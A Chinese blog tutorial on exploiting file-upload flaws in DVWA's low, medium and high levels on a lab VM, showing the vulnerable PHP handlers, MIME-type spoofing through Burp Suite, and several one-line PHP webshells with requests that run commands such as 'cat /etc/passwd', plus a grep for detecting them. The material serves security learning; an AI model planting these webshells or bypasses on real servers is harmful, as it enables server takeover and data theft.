一、文件上传漏洞 低、中、高三级别 详解

最新推荐文章于 2024-04-22 10:22:34 发布
最新推荐文章于 2024-04-22 10:22:34 发布
阅读量1.7k 收藏 6
点赞数 1
分类专栏: 安全渗透—Hacker 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41959899/article/details/105555301
版权

文章目录

文件上传漏洞

项目实验环境

OWASP Broken Web Apps VM v1.2 靶场
burpsuite 代理服务器
Kali-Linux-2020.1-vmware-amd64 攻击机

实验一(低安全级别)

思路: 可以上传任意文件,没有做任何的检测,如果上传的是恶意的木马,就可以连接服务器,爆破,获取webshell
在这里插入图片描述

 <?php
    if (isset($_POST['Upload'])) {

            $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
            $target_path = $target_path . basename( $_FILES['uploaded']['name']);

            if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                
                echo '<pre>';
                echo 'Your image was not uploaded.';
                echo '</pre>';
                
              } else {
            
                echo '<pre>';
                echo $target_path . ' succesfully uploaded!';
                echo '</pre>';
                
            }

        }
?>

通过代码也可以发现,只要存在上传的文件对象就允许上传,并没有限制是否为图片文件

实验二(中安全级别)

思路: 限制上传的文件必须是是图片类型,且限定了大小,图片类型的限制用http中的请求类型,即MIME类型对请求头进行限制,此实验限制为图像类型

什么是MIME?
MIME (Multipurpose Internet Mail Extensions)(多功能网际邮件扩充协议) 是描述消息内容类型的因特网标准,在HTTP中,MIME类型被定义在Content-TypeHeader中,每个MIME类型由两部分组成,前面是数据的大类别,例如声音audio、图象image等,后面定义具体的种类。

常见的MIME类型(通用型):

超文本标记语言文本             .html            text/html
xml文档                            .xml            text/xml
XHTML文档                        xhtml         application/xhtml+xml
普通文本                          .txt              text/plain
RTF文本                              .rtf              application/rtf
PDF文档                              .pdf          application/pdf
Microsoft Word文件             .doc             application/msword
PNG图像                              .png          image/png
GIF图形                              .gif              image/gif
JPEG图形                          .jpeg,.jpg     image/jpeg
au声音文件                        .au              audio/basic
MIDI音乐文件                  .mid,.midi     audio/midi,audio/x-midi
RealAudio音乐文件           .ra, .ram     audio/x-pn-realaudio
MPEG文件                           .mpg,.mpeg     video/mpeg
AVI文件                           .avi             video/x-msvideo
GZIP文件                           .gz             application/x-gzip
TAR文件                           .tar             application/x-tar
任意的二进制数据                           application/octet-stream

在这里插入图片描述

比如,打开淘宝网,可以看到高亮栏的content-type为imag/png
在这里插入图片描述分析:
那么,可以通过更改请求头的这个信息,使其为网页需要的图片的MIME类型即可

此时,使用burpsuite进行代理
思路:
在这里插入图片描述
步骤:
1.在Kali上打开burpsuite,代理的功能打开,并设置为所有的接口
在这里插入图片描述2.将物理主机的代理功能打开,指向Kali
在这里插入图片描述3.打开浏览器访问文件上传的网页,选择一个文本文件,点击上传 ,此时kali就截到了 这个HTTP的请求信息
在这里插入图片描述4.更改content-type为image/jpeg
在这里插入图片描述可见,不是图片的文件就被上传了,这样就可以上传一个恶意的一句话木马,使用中国菜刀的软件就可以进行连接,进行爬取数据,下面会做解释
在这里插入图片描述
查看后台的php代码,限制的就是MIME类型,通过修改请求头中的这个类型,就可以蒙混过关

 <?php
    if (isset($_POST['Upload'])) {

            $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
            $target_path = $target_path . basename($_FILES['uploaded']['name']);
            $uploaded_name = $_FILES['uploaded']['name'];
            $uploaded_type = $_FILES['uploaded']['type'];
            $uploaded_size = $_FILES['uploaded']['size'];

            if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){


                if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                
                    echo '<pre>';
                    echo 'Your image was not uploaded.';
                    echo '</pre>';
                    
                  } else {
                
                    echo '<pre>';
                    echo $target_path . ' succesfully uploaded!';
                    echo '</pre>';
                    
                    }
            }
            else{
                echo '<pre>Your image was not uploaded.</pre>';
            }
        }
?>

实验三(高安全级别)

网站设计: 限制上传文件的扩展名,必须是jpg、JPG、jpeg、JPEG 与图片的大小,这时,修改MIME类型是没有用的,因为网页的后端PHP语言限制的是文件的后缀名,如果直接更改文件的后缀名,会导致木马程序失效(即不能使用)
查看后台的php代码

 <?php
if (isset($_POST['Upload'])) {

            $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
            $target_path = $target_path . basename($_LES['uploaded']['name']);
            $uploaded_name = $_FILES['uploaded']['name'];
            $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
            $uploaded_size = $_FILES['uploaded']['size'];

            if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){


                if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                    
                    echo '<pre>';
                    echo 'Your image was not uploaded.';
                    echo '</pre>';
                
                  } else {
                
                    echo '<pre>';
                    echo $target_path . ' succesfully uploaded!';
                    echo '</pre>';
                    
                    }
            }           
            else{              
                echo '<pre>';
                echo 'Your image was not uploaded.';
                echo '</pre>';

            }
        }

?>

webshell

小马:一句话木马也称小马,即整个shell代码只有一行,一般是系统执行函数

大马:代码里和功能都比小马多,一般会进行二进制编码加密码,防止被安全防火墙/入侵系统检测到

yichen.php 
<?php eval($_REQUEST['eichi']);?> 需要网页的输入式请求,单引号中写的是请求的实,理解成变量名即可
root@owaspbwa:/var/www/dvwa/hackable/uploads# cat yichen.php 
<?php eval($_REQUEST['eichi']);?>
http://192.168.211.143/dvwa/hackable/uploads/yichen.php?eichi=phpinfo();

在这里插入图片描述

yichen1.php #eval 
<?php system($_REQUEST['eichi']);?> 调用系统的函数
root@owaspbwa:/var/www/dvwa/hackable/uploads# cat yichen1.php 
<?php system($_REQUEST['eichi']);?>
http://192.168.211.143/dvwa/hackable/uploads/yichen1.php?eichi=cat /etc/passwd

在这里插入图片描述可怕吗 ?如果你觉得还行,那就请继续看下去,还有更恐怖的~
使用页面文件上传页面,上传一个这样的php代码

<?php @eval($_POST['yichen']);?> 方括号内的是密码
root@owaspbwa:/var/www/dvwa/hackable/uploads# cat shell.php 
<?php @eval($_POST['yichen']);?>
说明:request是在网页端输入变量访问,POST是使用类似中国菜刀的工具进行连接,是C/S架构
http://192.168.211.143/dvwa/hackable/uploads/shell.php

网页访问,并没有什么内容,但是使用中国菜刀连接,就可以对这个网站进行爬取,获取任意你需要的内容与数据
在这里插入图片描述在这里插入图片描述

总结:

1.实验1没有任何要求,不做赘述

2.实验2限制了上传文件的HTTP中MIME类型,根据使用代理服务器来更改请求头中的MIME类型为图片类型

3.实验3限制了上传文件的后缀名,那就上传一个图片木马,对于高安全级别的图片木马注入,请点击这里文件包含漏洞 低、中 、高三级别详解(一句话木马,图片木马)

解决:

使用过滤功能来查看恶意的木马程序,使用防火墙,waf等工具

root@owaspbwa:~# fgrep -R 'eval($_POST[' /var/www/dvwa
/var/www/dvwa/hackable/uploads/shell.php:<?php @eval($_POST['yichen']);?>
/var/www/dvwa/vulnerabilities/fi/shell20.php:<?php eval($_POST[123]);?>
/var/www/dvwa/vulnerabilities/fi/shell999.php:<?php eval($_POST[123]);?>

CC攻击与DDOS工具

CC是应用程序瘫痪,比如发送验证码的网页瘫痪;DDOS网络发起攻击,增大网络的负载

Eichi_
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JavaScript文件上传API详解
01-19
对于Web程序员来说,在网页上处理文件上传,总是一件很麻烦的事情。在过去,我们不能够通过拖拽上传图片,也没有复杂Ajax上传技术,很少处理多文件批量上传。我们也无法获取上传过程的信息,除非上传完成后从...
DVWA系列(九)——使用Burpsuite进行File Upload(文件上传
热门推荐
橘子女侠
05-07 1万+
1. 文件包含(File Upload)漏洞简介 (1)文件上传 File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限; 这里上传的文件可以是木马,病毒,恶意脚本等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理...
DVWA上传文件-级-攻略
真正的大师,永远都怀着一颗学徒的心。
07-21 951
文章目录一、一句话木马shell.php二、利用BP修改文件属性1)通过查看源码分析出它的上传做了限制2)我们通过修改他的文件类型来达到欺骗服务器的目的3)修改后文件成功上传4)蚁jian连接。总结 一、一句话木马shell.php 二、利用BP修改文件属性 1)通过查看源码分析出它的上传做了限制 2)我们通过修改他的文件类型来达到欺骗服务器的目的 3)修改后文件成功上传 4)蚁jian连接。 成功连接。 总结 查看源码分析出过滤条件。 利用BP修改上传文件类型成功绕过。 上传成功 ...
文件上传漏洞 详细教程(最全讲解)
最新发布
m0_69043895的博客
04-22 1904
硬怼的话,主要是从下面这些方法入手去操作。(1)fuzz后缀名看看有无漏网之鱼(针对开发自定义的过滤可能有机会,针对waf基本不可能。更多的情况是php的站寻找文件包含或者解析漏洞乃至传配置文件一类的,但是对于这种也大可不必fuzz后缀名了)(2)http头变量改造首先要明确waf的检测特征,一般是基于某种特定的情况下,去针对相应的拦截。
DVWA系列---File Upload 文件上传漏洞
野原新之助
01-27 499
文章目录一、前言二、Low级别1、演示三、Medium级别四、High级别 一、前言 文件上传漏洞是指: 服务器对用户上传的文件没有进行严格过滤,导致用户上传了一些危险文件(如一句话木马的php文件),然后访问这些危险文件,对服务器造成控制或破坏。 预防方法: 1、对用户可上传的文件类型及进行严格控制,设置白名单,防止用户上传危险文件; 2、对上传的文件进行文件名转换,防止用户直接访问到上传的文件...
网络安全之OWASP Broken Web Apps渗透测试环境搭建&安装 详细教程
小啊呜的博客
05-08 1万+
网络安全之OWASP Broken Web Apps渗透测试环境搭建&安装 详细教程 一、关于 OWASP 下载安装 二、导入VMware Worksation 三、登录和访问 叮嘟!这里是小啊呜的学习课程资料整理。好记性不如烂笔头,今天也是努力进步的一天。一起加油进阶吧!
DVWA靶场之文件上传(三个等级)
m0_55854679的博客
05-02 9177
文件上传 文件上传的要点:(1)绕过题目的各种过滤手段成功上传文件并且不被删除; (2)确保文件可以正常运行; (3)确保文件可以执行命令。 一句话木马(简称Webshell) <?php @eval($_POST['cmd']); ?> 基本原理 利用文件上传漏洞,往目标网站上传一句话木马,然后你就可以在本地通过蚁剑或者国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['cmd']表示从页面
OWASP-文件上传漏洞简述(高)
qq_55803921的博客
11-04 1016
OWASP-文件上传漏洞简述:OWASP-文件上传漏洞级):OWASP-文件上传漏洞级):OWASP-文件上传漏洞高级):webshell文件包含: 注:仅作学习使用 OWASP-文件上传漏洞级): 首先上传一个jgp图片,测试它上传成功的反应: 发现上传成功是这样的: 然后试试上传其他类型的文件,此处是一个html的文件,发现可以上传成功: 再试试上传一句话木马可不可以: 上传成功哈: 访问一下自己的文件(靶场不同于网站,其他网站得自己找路径): 虽然没看显示东西,但是东西就在这里
DVWA文件上传(不同级别
qq_43452198的博客
04-22 2301
File Uploadlowmediumhighimpossible 文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞 low <?php if( isset( $_POST[ 'Upload' ] ) ) ...
上传漏洞实战——国菜刀和kali
测试喵~
07-22 1399
1.实验环境 目标靶机:OWASP_Broken_Web_Apps_VM_1.2我们还需要 国菜刀 和 kali 这两个工具,把所有的杀毒软件关了,不然国菜刀可能会被杀毒软件和谐。实验原理 1、文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等2、正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回3、如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webs
PHP 网络开发详解之远程文件包含漏洞
10-29
由于PHP支持使用相同的函数(Function)对本地文件和远程文件进行操作。因此,一些恶意用户通过强行使网站上的PHP代码(Code)包含自己的文件来实现执行自己脚本的目的。
javaStruts2文件上传问题详解
09-03
件上传和文件下载是我们在web应用程序常用的两个功能,在java,实现这两种功能的方式也有很多种,其struts2就给我们提供了一种算是比较简单的方式吧,下面我们就一起来看一下,
iOS开发以application/json上传文件实例详解
01-04
本文通过实例代码给大家讲解iOS以application/json上传文件的形式,具体内容详情大家参考下本文。 在和sever后台交互的过程、有时候、他们需要我们iOS开发者以“application/json”形式上传。 NSString *access...
Linux常用的反弹shell命令
m0_63200360的博客
04-24 2603
什么是反弹shell?反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。
国蚁剑+burpsuite+webshell文件上传(超完整)
qq_50953689的博客
05-14 2699
之前:需要打开phpstudy的靶场环境 第一步 ➊准备木马文件 新建木马文件ttx.php,文件内容为 <?php @eval($_REQUEST["shell"]); ?> ➋保存后,将文件后缀名php改为jpg ➌登录dvwa测试环境,将security等级改为‘low’(其它模式,后端也做了校验,无法完成第⑤步的操作),然后打开文件上传模块 ➍上传文件,选择第②步保存的shell.jpg,在点击‘Upload’之前,打开burpsuite拦截功能并且点击‘Upl
文件上传&高级用法文件复制
weixin_53479037的博客
04-11 596
目标文件的路径(可能与源路径的不同提供程序相关联)- 指定副本应如何完成的选项。- 要复制的文件的路径。
Kali渗透测试之DVWA系列10——File Upload(文件上传)
浅浅的博客
06-14 5740
一、File Upload(文件上传) 1、文件上传原理 File Upload,即文件上传漏洞。通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。简单点说,就是用户直接或者通过各种绕过方式将 webshell 上传到服务器进而执行利用。 2、文件上传漏洞前提条件...
DVWA文件上传漏洞级_级_高级
weixin_42786460的博客
09-01 576
DVWA文件上传漏洞级_级_高级
文件上传渗透实验
xiongIT的博客
10-31 1457
文件上传渗透实验
java 上传文件漏洞修复_文件上传漏洞详解
05-31
对于 Java 上传文件漏洞,常见的修复方法有以下几种: 1. 文件类型白名单过滤:在上传文件时,对文件的类型进行限制,只允许上传指定类型的文件,例如图片、文档等,从而防止上传恶意脚本等危险文件。 2. 文件名...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值